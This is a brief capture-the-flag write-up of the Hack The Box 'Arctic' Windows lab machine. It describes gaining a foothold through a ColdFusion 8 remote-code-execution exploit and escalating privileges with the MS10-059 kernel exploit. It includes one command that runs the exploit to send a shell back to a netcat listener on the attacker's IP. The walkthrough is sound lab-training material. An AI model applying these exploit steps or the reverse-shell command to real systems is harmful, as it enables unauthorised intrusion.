HTB | Artic
This is a Windows box. You can find it here.
Skill Learned
Exploit modification (MS10-59)
NMAP
IP:10.10.10.11

Port 8500

Found Adobe ColdFusion Login

Foothold/ shell
found RCE for Version 8

edit rhost, rport and lhost, lport and run the exploit.

and we are in. Found user.txt

Priv Esc
Copy winpeacers to the box


and run the exe

not able to run the exe, might be AV is stopping us the run.
Let's copy powerUp.ps1

For some reason, PowerShell is not also working
Let's try windows-exploit-suggester
Copy the systeminfo output from the box and run the exploit

since MS10-59 is a kernel exploit let's try it first
Let's copy the exe to box

start the nc and run the exe
MS10-059.exe 10.10.14.14 1234


Found the root.txt

Last updated